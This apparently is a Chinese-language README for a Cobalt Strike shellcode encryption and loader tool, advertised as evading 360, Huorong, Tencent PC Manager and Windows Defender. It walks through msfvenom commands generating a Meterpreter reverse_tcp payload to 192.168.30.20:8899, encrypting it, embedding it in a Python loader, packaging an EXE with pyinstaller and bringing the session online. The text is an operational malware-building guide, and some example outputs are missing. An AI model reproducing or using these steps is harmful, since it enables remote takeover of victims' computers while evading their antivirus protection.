0x01 工具介绍 CobaltStrike免杀ShellCode加载器 Shellcode_encryption - 免杀Shellcode加密生成工具 目前测试免杀360&火绒&电脑管家&Windows Defender(其他杀软未测试)。 0x02 安装与使用 1、生成Msf_Payload msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c -o payload.c
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f py -o payload_py.c 2、生成CobaltStrike_Payload 选择使用x64的C语言或Python语言的Shellcode。 得到一个payload.c的文件,内容为: 3、加密Payload
4、配置ShellCode加载器,将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = '密文Shellcode' 处 示例: 5、打包可执行程序(EXE编译环境),生成ShellCode_Loader.exe在dist目录中 Python 3.8.6 pyinstaller 4.7 pip install -r requirements.txt -i https://pypi.tuna./simple pyinstaller -F -w ShellCode_Loader.py 6、上线测试 运行监听
|
|